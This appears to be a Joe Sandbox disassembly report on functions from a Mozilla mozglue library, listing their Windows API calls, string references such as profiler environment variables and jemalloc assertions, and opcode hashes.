String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
API String ID: 3686969729-1266492768
Opcode ID: 15a02e19587a3266c9a89b204700ec4f85c55d2de9d87a5c044e61ea7b18b27c
Instruction ID: 6048674e254740fa37413a88e79ba0bfd19137ef93847031fe58c57cb8861fb5
Opcode Fuzzy Hash: 15a02e19587a3266c9a89b204700ec4f85c55d2de9d87a5c044e61ea7b18b27c
Instruction Fuzzy Hash: 672201B1A043409FEB009F75889C66A77B4EF8730CFA4462AE84687B41E731D565CB6F

Function 6C656C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C656CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C656D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C656D26

Part of subcall function 6C65CA10: malloc.MOZGLUE(?), ref: 6C65CA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C656D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C656D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C656D73
free.MOZGLUE(00000000), ref: 6C656D80
CertGetNameStringW.CRYPT32 ref: 6C656DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C656DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C656DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C656DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C656E10
CryptMsgClose.CRYPT32(00000000), ref: 6C656E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C656E34
CreateFileW.KERNEL32 ref: 6C656EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C656F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C656F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C65709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C657103
free.MOZGLUE(00000000), ref: 6C657153
CloseHandle.KERNEL32(?), ref: 6C657176
__Init_thread_footer.LIBCMT ref: 6C657209
__Init_thread_footer.LIBCMT ref: 6C65723A
__Init_thread_footer.LIBCMT ref: 6C65726B
__Init_thread_footer.LIBCMT ref: 6C65729C
__Init_thread_footer.LIBCMT ref: 6C6572DC
__Init_thread_footer.LIBCMT ref: 6C65730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C6573C2
VerSetConditionMask.NTDLL ref: 6C6573F3
VerSetConditionMask.NTDLL ref: 6C6573FF
VerSetConditionMask.NTDLL ref: 6C657406
VerSetConditionMask.NTDLL ref: 6C65740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C65741A
moz_xmalloc.MOZGLUE(?), ref: 6C65755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C657568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C657585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C657598
free.MOZGLUE(00000000), ref: 6C6575AC

Part of subcall function 6C67AB89: EnterCriticalSection.KERNEL32(6C6CE370,?,?,?,6C6434DE,6C6CF6CC,?,?,?,?,?,?,?,6C643284), ref: 6C67AB94
Part of subcall function 6C67AB89: LeaveCriticalSection.KERNEL32(6C6CE370,?,6C6434DE,6C6CF6CC,?,?,?,?,?,?,?,6C643284,?,?,6C6656F6), ref: 6C67ABD1

Strings

CryptCATAdminReleaseCatalogContext, xrefs: 6C6572C8
wintrust.dll, xrefs: 6C6572CD
(, xrefs: 6C65768A
SHA256, xrefs: 6C656EC0

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: 01b1cf8fdf5a2b46ee59ed51e34fbd9aecc834f336fe7708fa61edbf732bf7ee
Instruction ID: dba331c7a1890539a7d25698bc893666614d6cd71a947a1efeb4db9e1df273ed
Opcode Fuzzy Hash: 01b1cf8fdf5a2b46ee59ed51e34fbd9aecc834f336fe7708fa61edbf732bf7ee
Instruction Fuzzy Hash: BF52E7B1A012149FEB21DF25CCC4BAA77B8FF46704F108599E909A7640DB30AF95CF99

Function 6C680DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C680F1F
LeaveCriticalSection.KERNEL32(?), ref: 6C680F99
memcpy.VCRUNTIME140(?,?,?), ref: 6C680FB7
EnterCriticalSection.KERNEL32(?), ref: 6C680FE9
memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C681031
LeaveCriticalSection.KERNEL32(?), ref: 6C6810D0
EnterCriticalSection.KERNEL32(?), ref: 6C68117D
memset.VCRUNTIME140(?,000000E5,?), ref: 6C681C39
EnterCriticalSection.KERNEL32(6C6CE744), ref: 6C683391
LeaveCriticalSection.KERNEL32(6C6CE744), ref: 6C6833CD
LeaveCriticalSection.KERNEL32(?), ref: 6C683431
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C683437

Strings

Compile-time page size does not divide the runtime one., xrefs: 6C683946
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C6837A8
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C683559, 6C68382D, 6C683848
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C6837BD
<jemalloc>, xrefs: 6C683941, 6C6839F1
MOZ_CRASH(), xrefs: 6C683950
MALLOC_OPTIONS, xrefs: 6C6835FE
MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C683793
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C6837D2
: (malloc) Unsupported character in malloc options: ', xrefs: 6C683A02

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3040639385-4173974723
Opcode ID: a3811523ac95b3c9cf810f0da74dc448bf7cab87f285c5de357986e1cd100d0d
Instruction ID: 268eabb1b5d5a35de61f1765db4af33c265865daa0f27ffd11d27e9b5dbc14aa
Opcode Fuzzy Hash: a3811523ac95b3c9cf810f0da74dc448bf7cab87f285c5de357986e1cd100d0d
Instruction Fuzzy Hash: E5539DB1A067018FC704CF29C580616FBE1FF89328F29C66DE8699B791D771E841CB99

Function 6C6A34A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON

Download Yara Rule

APIs

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A3527
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A355B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A35BC
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A35E0
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A363A
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A3693
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A36CD
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A3703
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A373C
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A3775
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A378F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A3892
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A38BB
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A3902
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A3939
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A3970
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A39EF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A3A26
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A3AE5
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A3E85
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A3EBA
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A3EE2

Part of subcall function 6C6A6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C6A61DD
Part of subcall function 6C6A6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C6A622C

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A40F9
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A412F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A4157

Part of subcall function 6C6A6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C6A6250
Part of subcall function 6C6A6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6A6292

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A441B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6A4448
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6A484E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6A4863
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6A4878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6A4896
free.MOZGLUE ref: 6C6A489F

Strings

, xrefs: 6C6A4CD2

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: floor$free$malloc$memcpy
String ID:
API String ID: 3842999660-3916222277
Opcode ID: cb192bca6d4e1e77902e46df2870a7ccc7834bbb1dcc86f724a9edf0daab271d
Instruction ID: 0293f94020d9932d634f4cdb214bf96a9eaa67f6cb650077e807946a9f2dedcc
Opcode Fuzzy Hash: cb192bca6d4e1e77902e46df2870a7ccc7834bbb1dcc86f724a9edf0daab271d
Instruction Fuzzy Hash: 78F26C70908B808FC725CF29C08469AFBF1FFCA304F518A5ED99997712DB719896CB46

Function 6C6564C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C6564DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C6564F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C656505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C656518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C65652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C65671C
GetCurrentProcess.KERNEL32 ref: 6C656724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C65672F
GetCurrentProcess.KERNEL32 ref: 6C656759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C656764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C656A80
GetSystemInfo.KERNEL32(?), ref: 6C656ABE
__Init_thread_footer.LIBCMT ref: 6C656AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C656AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C656AF7

Strings

nvdxgiwrap.dll, xrefs: 6C656513
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C656798
detoured.dll, xrefs: 6C6564DA
nvd3d9wrap.dll, xrefs: 6C656500
user32.dll, xrefs: 6C656526
_etoured.dll, xrefs: 6C6564ED

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: 3b2db143a1cbcd975e36dc362d62bc7afe8f453f05a8a60b1061210eea2b2883
Instruction ID: 92de16284c52db7163434d9febb638029d03f6bdc14abfefe57acc7e33b741be
Opcode Fuzzy Hash: 3b2db143a1cbcd975e36dc362d62bc7afe8f453f05a8a60b1061210eea2b2883
Instruction Fuzzy Hash: ADF1E170A052199FDB20CF25CC88BDAB7B4AF46318F644299E809E3741D731EE95CF99

Function 6C6AC4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6AC5F9
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6AC6FB
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C6AC74D
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C6AC7DE
memset.VCRUNTIME140(?,00000000,00004014), ref: 6C6AC9D5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6ACC76
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6ACD7A
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6ADB40
memcpy.VCRUNTIME140(?,?,?), ref: 6C6ADB62
memcpy.VCRUNTIME140(?,?,?), ref: 6C6ADB99
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6ADD8B
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6ADE95
memcpy.VCRUNTIME140(?,?,?), ref: 6C6AE360
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6AE432
memcpy.VCRUNTIME140(?,?,?), ref: 6C6AE472

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction ID: d62df0cfdb221e09615c0fa3b698ed25b89c67823d48d1122e8a0d53cf700e34
Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction Fuzzy Hash: 40339D71E0421A8FCB04CFA8C8806EDBBF2FF49314F288269D955AB755D731AD46CB94

Function 6C66ED10 Relevance: 32.4, APIs: 16, Strings: 2, Instructions: 5407COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C66EE7A
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C66EFB5
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C671695
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6716B4
memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C671770
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C671A3E

Strings

~qdl, xrefs: 6C66ED10
~qdl, xrefs: 6C66ED13

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID: ~qdl$~qdl
API String ID: 3693777188-291169772
Opcode ID: 7871f4921a83a0d790d0977469b5e47c725beffcdf69c05c5918915fc7801e63
Instruction ID: d95293697719abc45f5f7ef8c7007f753329cdb2de8d4981aec4ac4cc7b62fb9
Opcode Fuzzy Hash: 7871f4921a83a0d790d0977469b5e47c725beffcdf69c05c5918915fc7801e63
Instruction Fuzzy Hash: 12B32A71E00219CFCB24CFA8C890ADDB7B2BF49304F2585A9D459AB745D731AD86CFA4

Function 6C65FD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6CE7B8), ref: 6C65FF81
LeaveCriticalSection.KERNEL32(6C6CE7B8), ref: 6C66022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C660240
EnterCriticalSection.KERNEL32(6C6CE768), ref: 6C66025B
LeaveCriticalSection.KERNEL32(6C6CE768), ref: 6C66027B

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C65FE99, 6C65FEB7, 6C65FED3, 6C660DB8, 6C660DD3, 6C6619B4
: (malloc) Error in VirtualFree(), xrefs: 6C660D67, 6C660D7B, 6C660DAC
<jemalloc>, xrefs: 6C660D62, 6C660D76, 6C660DA7

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3577267516
Opcode ID: 91062cf8e036ce7e25ee7613da25a7fd8c20551c32ac7ceb9fb9519dda299bf4
Instruction ID: fb771e4740a9594083901491cb6c01c6b267cfd4f06dea8b842aa436ec8d8fe7
Opcode Fuzzy Hash: 91062cf8e036ce7e25ee7613da25a7fd8c20551c32ac7ceb9fb9519dda299bf4
Instruction Fuzzy Hash: 47C2D171A057418FD714CF2AC480756BBE1FF85328F28C66DE4A98BB95D771E801CB8A

Function 6C6AE680 Relevance: 31.1, APIs: 22, Instructions: 3648COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00004014), ref: 6C6AE811
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6AEAA8
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6AEBD5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6AEEF6
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6AF223
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C6AF322
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6B0E03
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C6B0E54
memcpy.VCRUNTIME140(?,?,?), ref: 6C6B0EAE
memcpy.VCRUNTIME140(?,?,?), ref: 6C6B0ED4

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 20aaba6f133e47414ca0b7b2af125a6e7aba17f5156f9e90836cf71bb1b94ee6
Instruction ID: 0482c6d98ca43cd81b945ec2195323e70b22157696a5e5bb7f221ad5dabab563
Opcode Fuzzy Hash: 20aaba6f133e47414ca0b7b2af125a6e7aba17f5156f9e90836cf71bb1b94ee6
Instruction Fuzzy Hash: 18639D71E0025A8FCB04CFA8C9906DDFBB2FF89304F298269D855BB755D730A946CB94

Function 6C683E50 Relevance: 28.8, APIs: 13, Strings: 3, Instructions: 765COMMON

Download Yara Rule

APIs

Part of subcall function 6C6A7770: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(}>hl,?,?,?,6C683E7D,?,?), ref: 6C6A777C

tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C683F17
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C683F5C
VerSetConditionMask.NTDLL ref: 6C683F8D
VerSetConditionMask.NTDLL ref: 6C683F99
VerSetConditionMask.NTDLL ref: 6C683FA0
VerSetConditionMask.NTDLL ref: 6C683FA7
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C683FB4

Strings

C>hl, xrefs: 6C683E93
nvd3d9wrap.dll, xrefs: 6C684466
nvinit.dll, xrefs: 6C684479

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemsettolowerwcslen
String ID: C>hl$nvd3d9wrap.dll$nvinit.dll
API String ID: 1189858803-427454947
Opcode ID: 2c6e48856b6942ed8cc6c11a37ea30adf61c7d540ad126fd7e869944065acb5a
Instruction ID: a7691eff287f918f28b3ada40b03008f6a1b68944f6aa5d8a60e42e346953ad7
Opcode Fuzzy Hash: 2c6e48856b6942ed8cc6c11a37ea30adf61c7d540ad126fd7e869944065acb5a
Instruction Fuzzy Hash: A7520271614B845FDB14DF30C8D0ABB77E9AF86308F54086DD5928BB82CB74E919CB68

Function 6C65FEF0 Relevance: 23.8, APIs: 13, Strings: 2, Instructions: 1294memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6CE7B8), ref: 6C65FF81
LeaveCriticalSection.KERNEL32(6C6CE7B8), ref: 6C66022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C660240
EnterCriticalSection.KERNEL32(6C6CE768), ref: 6C66025B
LeaveCriticalSection.KERNEL32(6C6CE768), ref: 6C66027B

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C65FE99, 6C65FEB7, 6C65FED3, 6C660DB8, 6C660DD3, 6C6619B4, 6C661A10
MOZ_CRASH(), xrefs: 6C660CA7

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3566792288
Opcode ID: 17d302dfcbfe0b4309d11bb971f77d219bbaf7ac09dac3d68f767ed9daae3a70
Instruction ID: 365b58f4c068801d09f8d20af7db10719854c5bbee5cad06ac967ac2f11bbf92
Opcode Fuzzy Hash: 17d302dfcbfe0b4309d11bb971f77d219bbaf7ac09dac3d68f767ed9daae3a70
Instruction Fuzzy Hash: 66B2CF716057418FD714CF2AC5D0756BBE1BF85328F28C66CE96A8BB95C770E840CB8A

Function 6C695600 Relevance: 22.0, APIs: 6, Strings: 6, Instructions: 950COMMON

Download Yara Rule

Strings

expected a Time entry, xrefs: 6C695CB6
name, xrefs: 6C695E79, 6C695E8F
schema, xrefs: 6C69606D
data, xrefs: 6C696131
expected a Count entry, xrefs: 6C695AC3
ProfileBuffer parse error: %s, xrefs: 6C695AC8, 6C695CBB

Memory Dump Source

